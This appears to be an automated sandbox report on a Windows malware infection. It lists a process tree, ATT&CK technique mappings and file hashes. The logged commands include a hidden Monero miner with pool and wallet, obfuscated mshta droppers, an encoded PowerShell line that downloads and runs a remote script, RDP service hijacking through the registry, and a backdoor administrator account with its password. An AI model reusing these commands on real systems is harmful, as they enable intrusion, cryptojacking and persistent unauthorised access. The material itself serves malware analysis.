"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
12⤵
PID:4924

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "/sihost64"
13⤵
PID:5012

C:\Users\Admin\AppData\Local\Temp\services64.exe
"C:\Users\Admin\AppData\Local\Temp\services64.exe"
14⤵
PID:5504

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\services64.exe"
15⤵
PID:1664

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
16⤵
- Executes dropped EXE
PID:5956

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "/sihost64"
17⤵
PID:3116

C:\Windows\System32\conhost.exe
C:\Windows/System32\conhost.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=45JpPqakEn7EwqkL6WB28DLDt58UcCNARMdsAGo6VGdfUByVDFtFCxrNBD7UhWSNvGQCjvLgahxNrMc3T7szAVfj2JW7Kyq --pass=666 --cpu-max-threads-hint=90 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-kill-targets="" --cinit-idle-wait=5 --cinit-idle-cpu=50 --cinit-stealth --cinit-kill
8⤵
PID:6232

C:\Users\Admin\AppData\Local\Temp\Haemotoxic.exe
"C:\Users\Admin\AppData\Local\Temp\Haemotoxic.exe"
3⤵
PID:1724

C:\Users\Admin\AppData\Local\Temp\4657.exe
C:\Users\Admin\AppData\Local\Temp\4657.exe
1⤵
PID:4680

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
2⤵
PID:868

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\fwd24vqw\fwd24vqw.cmdline"
3⤵
PID:4868

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES49C.tmp" "c:\Users\Admin\AppData\Local\Temp\fwd24vqw\CSCB97D66EC88674CEC949EE14EB448AE52.TMP"
4⤵
PID:6760

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
3⤵
PID:5388

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
3⤵
PID:3776

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
3⤵
PID:6976

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
3⤵
PID:6780

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
3⤵
- Modifies registry key
PID:1016

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
3⤵
PID:2892

C:\Windows\SysWOW64\net.exe
"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
3⤵
PID:6912

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
4⤵
PID:2080

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
3⤵
PID:6432

C:\Windows\SysWOW64\cmd.exe
cmd /c net start rdpdr
4⤵
PID:1872

C:\Windows\SysWOW64\net.exe
net start rdpdr
5⤵
PID:712

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 start rdpdr
6⤵
PID:1644

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
3⤵
PID:6248

C:\Windows\SysWOW64\cmd.exe
cmd /c net start TermService
4⤵
PID:1428

C:\Windows\SysWOW64\net.exe
net start TermService
5⤵
PID:2996

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 start TermService
6⤵
PID:3640

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
3⤵
PID:6296

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
3⤵
PID:6728

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
- Accesses Microsoft Outlook profiles
- outlook_office_path
- outlook_win_path
PID:2172

C:\Users\Admin\AppData\Local\Temp\57FC.exe
C:\Users\Admin\AppData\Local\Temp\57FC.exe
1⤵
PID:3212

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:6248

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
- Executes dropped EXE
PID:4536

C:\Users\Admin\AppData\Local\Temp\938F.exe
C:\Users\Admin\AppData\Local\Temp\938F.exe
1⤵
PID:4752

C:\Users\Admin\AppData\Local\Temp\938F.exe
C:\Users\Admin\AppData\Local\Temp\938F.exe
2⤵
PID:6340

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Users\Admin\AppData\Local\0e928362-c86b-4933-9652-a702fa331007" /deny *S-1-1-0:(OI)(CI)(DE,DC)
3⤵
- Modifies file permissions
PID:6928

C:\Users\Admin\AppData\Local\Temp\938F.exe
"C:\Users\Admin\AppData\Local\Temp\938F.exe" --Admin IsNotAutoStart IsNotTask
3⤵
PID:3020

C:\Users\Admin\AppData\Local\Temp\938F.exe
"C:\Users\Admin\AppData\Local\Temp\938F.exe" --Admin IsNotAutoStart IsNotTask
4⤵
PID:5872

C:\Users\Admin\AppData\Local\e8e10531-7466-4ac5-a0be-ce4ad8444117\build2.exe
"C:\Users\Admin\AppData\Local\e8e10531-7466-4ac5-a0be-ce4ad8444117\build2.exe"
5⤵
PID:6768

C:\Users\Admin\AppData\Local\e8e10531-7466-4ac5-a0be-ce4ad8444117\build2.exe
"C:\Users\Admin\AppData\Local\e8e10531-7466-4ac5-a0be-ce4ad8444117\build2.exe"
6⤵
PID:4524

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im build2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\e8e10531-7466-4ac5-a0be-ce4ad8444117\build2.exe" & del C:\ProgramData\*.dll & exit
7⤵
PID:6516

C:\Windows\SysWOW64\taskkill.exe
taskkill /im build2.exe /f
8⤵
- Kills process with taskkill
PID:6896

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
8⤵
- Delays execution with timeout.exe
PID:5324

C:\Users\Admin\AppData\Local\e8e10531-7466-4ac5-a0be-ce4ad8444117\build3.exe
"C:\Users\Admin\AppData\Local\e8e10531-7466-4ac5-a0be-ce4ad8444117\build3.exe"
5⤵
PID:6576

C:\Users\Admin\AppData\Local\e8e10531-7466-4ac5-a0be-ce4ad8444117\build3.exe
"C:\Users\Admin\AppData\Local\e8e10531-7466-4ac5-a0be-ce4ad8444117\build3.exe"
6⤵
PID:5132

C:\Windows\SysWOW64\schtasks.exe
/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
7⤵
- Creates scheduled task(s)
PID:4408

C:\Users\Admin\AppData\Local\Temp\A320.exe
C:\Users\Admin\AppData\Local\Temp\A320.exe
1⤵
PID:5948

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VBscRiPt:cloSE (crEAtEoBjeCT ( "WscRiPT.ShelL" ).ruN ("C:\Windows\system32\cmd.exe /r Type ""C:\Users\Admin\AppData\Local\Temp\A320.exe""> ..\ZYQ2GP.exE&& sTaRT ..\ZYQ2gP.EXE -pgQ8DrCnIS3kqp6Tt9RSrrwh402M &if """"== """" for %N IN ( ""C:\Users\Admin\AppData\Local\Temp\A320.exe"") do taskkill -f /im ""%~nXN"" ",0, TruE ))
2⤵
PID:5988

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /r Type "C:\Users\Admin\AppData\Local\Temp\A320.exe"> ..\ZYQ2GP.exE&& sTaRT ..\ZYQ2gP.EXE -pgQ8DrCnIS3kqp6Tt9RSrrwh402M &if ""== "" for %N IN ( "C:\Users\Admin\AppData\Local\Temp\A320.exe") do taskkill -f /im "%~nXN"
3⤵
PID:6064

C:\Users\Admin\AppData\Local\Temp\ZYQ2GP.exE
..\ZYQ2gP.EXE -pgQ8DrCnIS3kqp6Tt9RSrrwh402M
4⤵
PID:6616

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VBscRiPt:cloSE (crEAtEoBjeCT ( "WscRiPT.ShelL" ).ruN ("C:\Windows\system32\cmd.exe /r Type ""C:\Users\Admin\AppData\Local\Temp\ZYQ2GP.exE""> ..\ZYQ2GP.exE&& sTaRT ..\ZYQ2gP.EXE -pgQ8DrCnIS3kqp6Tt9RSrrwh402M &if ""-pgQ8DrCnIS3kqp6Tt9RSrrwh402M ""== """" for %N IN ( ""C:\Users\Admin\AppData\Local\Temp\ZYQ2GP.exE"") do taskkill -f /im ""%~nXN"" ",0, TruE ))
5⤵
PID:2288

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /r Type "C:\Users\Admin\AppData\Local\Temp\ZYQ2GP.exE"> ..\ZYQ2GP.exE&& sTaRT ..\ZYQ2gP.EXE -pgQ8DrCnIS3kqp6Tt9RSrrwh402M &if "-pgQ8DrCnIS3kqp6Tt9RSrrwh402M "== "" for %N IN ( "C:\Users\Admin\AppData\Local\Temp\ZYQ2GP.exE") do taskkill -f /im "%~nXN"
6⤵
PID:5324

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vBSCrIPt: cLOse( cReAtEObJeCt ("wscRIpT.SHElL").rUN ("C:\Windows\system32\cmd.exe /c EchO C%raNdom%rFh>7oZOQ.OD & EcHo | seT /P = ""MZ"" >L6yR3.WY& cOpY /B /Y L6yR3.WY + eEMjVORT.1 +TOpUY.KI+ VLtX.08A + zr5VW.4H + _CXO~XKa.O + 7oZOQ.OD ..\FGXAv.t1& dEl /Q *& STarT msiexec /y ..\FGXAv.t1 ", 0 , trUE ))
5⤵
PID:4072

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c EchO C%raNdom%rFh>7oZOQ.OD &EcHo | seT /P = "MZ" >L6yR3.WY& cOpY /B /Y L6yR3.WY + eEMjVORT.1 +TOpUY.KI+ VLtX.08A + zr5VW.4H + _CXO~XKa.O + 7oZOQ.OD ..\FGXAv.t1&dEl /Q *& STarT msiexec /y ..\FGXAv.t1
6⤵
PID:7004

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" EcHo "
7⤵
PID:5732

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" seT /P = "MZ" 1>L6yR3.WY"
7⤵
PID:6380

C:\Windows\SysWOW64\msiexec.exe
msiexec /y ..\FGXAv.t1
7⤵
PID:6656

C:\Windows\SysWOW64\taskkill.exe
taskkill -f /im "A320.exe"
4⤵
- Kills process with taskkill
PID:6764

C:\Users\Admin\AppData\Local\Temp\A8DE.exe
C:\Users\Admin\AppData\Local\Temp\A8DE.exe
1⤵
PID:5628

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im A8DE.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\A8DE.exe" & del C:\ProgramData\*.dll & exit
2⤵
PID:4556

C:\Windows\SysWOW64\taskkill.exe
taskkill /im A8DE.exe /f
3⤵
- Executes dropped EXE
- Kills process with taskkill
PID:3328

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
3⤵
- Delays execution with timeout.exe
PID:6404

C:\Users\Admin\AppData\Roaming\shuddht
C:\Users\Admin\AppData\Roaming\shuddht
1⤵
PID:5704

C:\Users\Admin\AppData\Roaming\jbuddht
C:\Users\Admin\AppData\Roaming\jbuddht
1⤵
PID:6412

C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe
C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe
1⤵
PID:6424

C:\Users\Admin\AppData\Roaming\wfuddht
C:\Users\Admin\AppData\Roaming\wfuddht
1⤵
- Executes dropped EXE
PID:6384

C:\Users\Admin\AppData\Roaming\wfuddht
C:\Users\Admin\AppData\Roaming\wfuddht
2⤵
PID:7152

C:\Users\Admin\AppData\Roaming\wduddht
C:\Users\Admin\AppData\Roaming\wduddht
1⤵
PID:6572

C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe
C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe
1⤵
PID:7108

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
1⤵
PID:396

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
2⤵
PID:5480

C:\Windows\SysWOW64\schtasks.exe
/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
3⤵
- Creates scheduled task(s)
PID:7100

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc 000000 /del
1⤵
PID:7104

C:\Windows\system32\net.exe
net.exe user WgaUtilAcc 000000 /del
2⤵
PID:6984

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user WgaUtilAcc 000000 /del
3⤵
PID:6700

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc XMh3VmQM /add
1⤵
PID:7160

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
2⤵
PID:6924

C:\Windows\system32\net.exe
net.exe user WgaUtilAcc XMh3VmQM /add
2⤵
PID:7060

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user WgaUtilAcc XMh3VmQM /add
3⤵
PID:6524

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
1⤵
PID:4472

C:\Windows\system32\net.exe
net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
2⤵
PID:3804

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
3⤵
PID:6392

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" JQKTJDNJ$ /ADD
1⤵
PID:4664

C:\Windows\system32\net.exe
net.exe LOCALGROUP "Remote Desktop Users" JQKTJDNJ$ /ADD
2⤵
PID:3212

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" JQKTJDNJ$ /ADD
3⤵
PID:4412

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
1⤵
- Executes dropped EXE
PID:6492

C:\Windows\system32\net.exe
net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
2⤵
PID:6600

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD
3⤵
PID:2164

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc XMh3VmQM
1⤵
PID:3900

C:\Windows\system32\net.exe
net.exe user WgaUtilAcc XMh3VmQM
2⤵
PID:5712

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user WgaUtilAcc XMh3VmQM
3⤵
PID:6352

C:\Windows\System32\cmd.exe
cmd.exe /C wmic path win32_VideoController get name
1⤵
PID:6820

C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
2⤵
PID:6300

C:\Windows\System32\cmd.exe
cmd.exe /C wmic CPU get NAME
1⤵
PID:5740

C:\Windows\System32\Wbem\WMIC.exe
wmic CPU get NAME
2⤵
PID:6640

C:\Windows\System32\cmd.exe
cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
1⤵
PID:4196

C:\Windows\system32\cmd.exe
cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
2⤵
PID:5568

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
3⤵
- Blocklisted process makes network request
PID:5540

C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe /update /peruser /childprocess
1⤵
PID:5016

C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.180.0905.0007\FileSyncConfig.exe
"C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.180.0905.0007\FileSyncConfig.exe"
2⤵
PID:6060

C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe
C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe
1⤵
PID:5824

\??\c:\windows\system\svchost.exe
c:\windows\system\svchost.exe
1⤵
PID:1496

C:\Windows\System32\cmd.exe
cmd.exe /C cmd.exe /C taskkill /F /IM service1.exe
1⤵
PID:6588

C:\Windows\system32\cmd.exe
cmd.exe /C taskkill /F /IM service1.exe
2⤵
PID:7008

C:\Windows\system32\taskkill.exe
taskkill /F /IM service1.exe
3⤵
- Kills process with taskkill
PID:6724

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
1⤵
PID:6084

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
2⤵
PID:6008

C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe
C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe
1⤵
PID:6508

C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe
C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe
1⤵
PID:6984

C:\Users\Admin\AppData\Roaming\shuddht
C:\Users\Admin\AppData\Roaming\shuddht
1⤵
PID:3612

C:\Users\Admin\AppData\Roaming\wfuddht
C:\Users\Admin\AppData\Roaming\wfuddht
1⤵
PID:6852

C:\Users\Admin\AppData\Roaming\wfuddht
C:\Users\Admin\AppData\Roaming\wfuddht
2⤵
PID:6228

C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe
C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe
1⤵
PID:3384

C:\Users\Admin\AppData\Roaming\jbuddht
C:\Users\Admin\AppData\Roaming\jbuddht
1⤵
PID:7112

C:\Users\Admin\AppData\Roaming\wduddht
C:\Users\Admin\AppData\Roaming\wduddht
1⤵
PID:5976

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
1⤵
PID:7060

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
2⤵
PID:2288

\??\c:\windows\system\svchost.exe
c:\windows\system\svchost.exe
1⤵
PID:4856

C:\Users\Admin\AppData\Local\Temp\164E.exe
C:\Users\Admin\AppData\Local\Temp\164E.exe
1⤵
PID:7012

C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe
C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe
1⤵
PID:4916

C:\Users\Admin\AppData\Local\0e928362-c86b-4933-9652-a702fa331007\938F.exe
C:\Users\Admin\AppData\Local\0e928362-c86b-4933-9652-a702fa331007\938F.exe --Task
1⤵
PID:6356

C:\Users\Admin\AppData\Local\0e928362-c86b-4933-9652-a702fa331007\938F.exe
C:\Users\Admin\AppData\Local\0e928362-c86b-4933-9652-a702fa331007\938F.exe --Task
2⤵
PID:7160

C:\Windows\system32\compattelrunner.exe
C:\Windows\system32\compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW
1⤵
PID:6604

C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe
C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe
1⤵
PID:3192

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
1⤵
PID:2220

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
2⤵
PID:5824

\??\c:\windows\system\svchost.exe
c:\windows\system\svchost.exe
1⤵
PID:2840

C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe
C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe
1⤵
PID:6724

C:\Users\Admin\AppData\Roaming\shuddht
C:\Users\Admin\AppData\Roaming\shuddht
1⤵
PID:5784

C:\Users\Admin\AppData\Roaming\jbuddht
C:\Users\Admin\AppData\Roaming\jbuddht
1⤵
PID:3044

C:\Users\Admin\AppData\Roaming\wfuddht
C:\Users\Admin\AppData\Roaming\wfuddht
1⤵
PID:5228

C:\Users\Admin\AppData\Roaming\wduddht
C:\Users\Admin\AppData\Roaming\wduddht
1⤵
PID:6316

C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe
C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe
1⤵
PID:1584

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
1⤵
PID:3384

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
2⤵
PID:6428

C:\Users\Admin\AppData\Local\0e928362-c86b-4933-9652-a702fa331007\938F.exe
C:\Users\Admin\AppData\Local\0e928362-c86b-4933-9652-a702fa331007\938F.exe --Task
1⤵
PID:4448

C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe
C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe
1⤵
PID:4912

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
1⤵
PID:6480

C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe
C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe
1⤵
PID:4888

\??\c:\windows\system\svchost.exe
c:\windows\system\svchost.exe
1⤵
PID:6648

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Account Manipulation

T1098

New Service

T1050

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

New Service

T1050

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Disabling Security Tools

T1089

Virtualization/Sandbox Evasion

T1497

File Permissions Modification

T1222

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

System Information Discovery

T1082

Peripheral Device Discovery

T1120

Lateral Movement

Collection

Data from Local System

T1005

Email Collection

T1114

Exfiltration

Command and Control

Web Service

T1102

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe
MD5
17f6f3213a5a5d2fb1ef8793081c5ddd

SHA1
4601bd223fd7c52b12bc186ec9a0eb94167aaebb

SHA256
6987f229daf0e954b67d5dbf779150b3b5c8dc3e69f66fe7c41f875be7725994

SHA512
b640e80f1aec1302ad95f88b3fa10d16df39f9ecf498eadcd602bbd945550c8843393ef6176a2fc3120cf3db487edd400f3a633ef944faae5abcef67637d7276

Download Submit
C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe
MD5
17f6f3213a5a5d2fb1ef8793081c5ddd

SHA1
4601bd223fd7c52b12bc186ec9a0eb94167aaebb

SHA256
6987f229daf0e954b67d5dbf779150b3b5c8dc3e69f66fe7c41f875be7725994

SHA512
b640e80f1aec1302ad95f88b3fa10d16df39f9ecf498eadcd602bbd945550c8843393ef6176a2fc3120cf3db487edd400f3a633ef944faae5abcef67637d7276

Download Submit
C:\Program Files (x86)\Company\NewProduct\cutm3.exe
MD5
07e143efd03815a3b8c8b90e7e5776f0

SHA1
077314efef70cef8f43eeba7f1b8ba0e5e5dedc9

SHA256
32967e652530e7ac72841886cb07badcced11e1e725e2e85e1ee8046c4fe2149

SHA512
79ed77bbcac3f84d846b4b02e1a50a197d857d4b1d6abd84a45393bb3c262768ab6f3952733a1ae6010978ab598842d9b7ac4be5a5b23c374a3d4796c87a38d6

Download Submit
C:\Program Files (x86)\Company\NewProduct\cutm3.exe
MD5
07e143efd03815a3b8c8b90e7e5776f0

SHA1
077314efef70cef8f43eeba7f1b8ba0e5e5dedc9

SHA256
32967e652530e7ac72841886cb07badcced11e1e725e2e85e1ee8046c4fe2149

SHA512
79ed77bbcac3f84d846b4b02e1a50a197d857d4b1d6abd84a45393bb3c262768ab6f3952733a1ae6010978ab598842d9b7ac4be5a5b23c374a3d4796c87a38d6

Download Submit
C:\Program Files (x86)\Company\NewProduct\inst3.exe
MD5
a41adbdafc72a86a7a74c494659954b4

SHA1
d43696a0e3704a141fc0cf6a1098525c00ce882f

SHA256
d6d48be25063b05a78a013810ef21ed4a64a2122f91fadcbaf609dee8cce6f7e

SHA512
44a1bd50cf1bed0ef1adaf7839ae8549c752b9825f542daa51730019f8f3186af0c12621789668e8a083625b90680d804d8a7a7de8f46da2df5cb7550afd45d2

Download Submit
C:\Program Files (x86)\Company\NewProduct\inst3.exe
MD5
a41adbdafc72a86a7a74c494659954b4

SHA1
d43696a0e3704a141fc0cf6a1098525c00ce882f

SHA256
d6d48be25063b05a78a013810ef21ed4a64a2122f91fadcbaf609dee8cce6f7e

SHA512
44a1bd50cf1bed0ef1adaf7839ae8549c752b9825f542daa51730019f8f3186af0c12621789668e8a083625b90680d804d8a7a7de8f46da2df5cb7550afd45d2

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751
MD5
54e9306f95f32e50ccd58af19753d929

SHA1
eab9457321f34d4dcf7d4a0ac83edc9131bf7c57

SHA256
45f94dceb18a8f738a26da09ce4558995a4fe02b971882e8116fc9b59813bb72

SHA512
